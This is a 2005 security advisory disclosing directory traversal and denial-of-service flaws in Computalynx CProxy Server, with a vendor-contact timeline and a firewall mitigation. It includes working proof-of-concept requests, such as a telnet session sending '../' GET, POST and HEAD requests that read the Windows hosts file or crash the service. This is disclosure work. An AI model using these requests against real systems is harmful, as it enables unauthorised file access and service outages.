Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities

[Kristof Philipsen <kristof.philipsen@xxxxxxxxxx>]

+=========================================================================================+
| Security Advisory: Computalynx CProxy Server Multiple Remote 
Vulnerabilities            |
+=========================================================================================+
| 
kristof.philipsen@xxxxxxxxxx                                             
March 02, 2005 |
+=========================================================================================+



AFFECTED PRODUCTS

Affected Software:

 - Computalynx CProxy 3.3.x for Win32
 - Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32

Possibly other software versions are affected.



IDENTIFIED ISSUES

The following issues were found to affect the aforementioned Computalynx 
CProxy Server software:

 [1] Directory Traversal and Arbitrary File Access Attack
 [2] Denial-of-Service Attack



BRIEF DESCRIPTION

Computalynx CProxy is a Windows platform based proxy server featuring 
HTTP, Telnet, POP3, SMTP,
FTP proxy functions, as well as Anti Virus and Content Filtering 
capabilities.       Because of
inadequate input validation, a malicious attacker can perform a 
directory traversal attack  and
thus gain access to arbitrary files located on the CProxy Server 
system.    Moreover, using the
same attack vector with especially crafted HTTP requests,    it is 
possible to crash the CProxy
service running on the remote system.



DETAILED DESCRIPTION

Computalynx CProxy Server is a multifunctional Windows platform based 
proxy server with  multi-
protocol support.   When performing proxy functions, CProxy Server is 
vulnerable to a directory
traversal attack.   Inadequate input validation and input filtering 
allows a remote attacker to
gain attack to arbitrary files on the Windows system upon which the 
CProxy Server software  has
been deployed.     This first issue of directory traversal lies within 
the fact that the CProxy
Server fails to filter out double dot attacks and in turn  fails  to  
protect  arbitrary  files
from being requested and opened using the proxy service.       An 
especially crafted URL allows
allows arbitrary files to be recovered from the system.       The 
retrieval of system files can
compromise the entire system or expose the system to further avenues of 
attack.     A malicious
attacker can perform a request using the following format to gain access 
to arbitrary data:

GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>

An attacker can gain access to a file in the WINNT directory as shown in 
the following example,
by connecting to CProxy Server's proxy service (listening on TCP port 
8080 by default),     and
executing the following request:


  ronin[kris] ~ $ telnet 10.0.0.1 8080
  Trying 10.0.0.1...
  Connected to 10.0.0.1.
  Escape character is '^]'.
  GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
                                                                                                                                                                                 

                         
  HTTP/1.0 200 OK
  Content-length: 734
  Date: Sat, 19 Feb 2005 21:09:58 GMT
  Date: Sat, 19 Feb 2005 21:09:58 GMT
  # Copyright (c) 1993-1999 Microsoft Corp.
  #
  # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  #
  # This file contains the mappings of IP addresses to host names. Each
  # entry should be kept on an individual line. The IP address should
  # be placed in the first column followed by the corresponding host name.
  # The IP address and the host name should be separated by at least one
  # space.
  #
  # Additionally, comments (such as these) may be inserted on individual
  # lines or following the machine name denoted by a '#' symbol.
  #
  # For example:
  #
  #      102.54.94.97     rhino.acme.com          # source server
  #       38.25.63.10     x.acme.com              # x client host
                                                                                                                                                                                 

                            
  127.0.0.1       localhost
  Connection closed by foreign host.


In conjunction with this method, other HTTP methods such as "POST" and 
"HEAD", will also lead to
arbitrary file retrieval.

When retrieving an arbitrary ASCII file using the "GET" method,  causes 
the file to be displayed
and immediately afterwards causes the CProxy Server  service  to  crash  
with an  error  message
indicating that "memory could not be read".  However, when retrieving 
this same ASCII file using
the "POST" or "HEAD" methods will cause the file contents to be 
displayed and does not crash the
CProxy Server service,       allowing an attacker to execute multiple 
requests and thus allowing
various arbitrary  files to be retrieved from the CProxy Server system.

 * The following request will cause the arbitrary file to be displayed:

   -> "POST http://../../../../../winnt/system32/drivers/etc/hosts 
HTTP/1.0"

 * The following request will cause the arbitrary file to be displayed 
and the CProxy Server
   service to crash:

   -> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

When attempting to retrieve an executable file using any of these HTTP 
methods ("GET","HEAD", or
"POST"), in the aforementioned manner,   will cause the contents of the 
executable file contents
to be displayed and the CProxy Server service to crash with an error 
message that "memory  could
not be read", rendering the service unavailable, thus resulting in a 
Denial-of-Service condition.

 * Both of the following requests will cause the arbitrary executable's 
contents to be displayed
   and the CProxy Server service to crash:

   -> "GET http://../../../../../winnt/system32/cmd.exe";
   -> "POST http://../../../../../winnt/system32/cmd.exe";



CHARACTERISTICS

* Inadequate input validation and filtering allows an attacker to 
perform directory traversal
 attacks against the systems running Computalynx CProxy Server.

* Different vectors of attack allow retrieval of arbitrary and possibly 
sensitive files from
 the system running Computalynx CProxy Server.

* Use of especially crafted URL's allow attackers to render to service 
unavailable, causing a
 Denial-of-Service condition.



SEVERITY

Each of these two issues affecting Computalynx CProxy Server software 
can directly or indirectly
allow partial or complete compromise of the system and/or the data 
stored on the system running
the CProxy Server software.

Moreover,        the second issue regarding a Denial-of-Service attack 
against the CProxy Server
software will directly affect any users depending on the availability of 
the functions which the
CProxy Software performs on this system.

Classification: MEDIUM to HIGH



VENDOR STATUS

19/Feb/2005 - Computalynx contacted regarding this issue.
02/Mar/2005 - At present, the vendor has not replied regarding this issue.



SOLUTION

* Currently awaiting vendor status for a solution regarding this issue.

* A mitigation strategy against attacks of this nature would be to 
ensure that remote connections
 to the CProxy Server are not authorised (i.e. through the use of 
proper firewall rules).



REFERENCES

[1] "Computalynx Software"
   - http://www.computalynx.com



--
Kristof Philipsen
Security Engineer 

Ubizen - a Cybertrust company
18 rue Robert Stumper
L-2557 Luxembourg
Luxembourg
T: 	+352 26 31 05 85
F: 	+352 26 31 05 86
E-mail: kristof.philipsen@xxxxxxxxxx

www.ubizen.com - www.cybertrust.com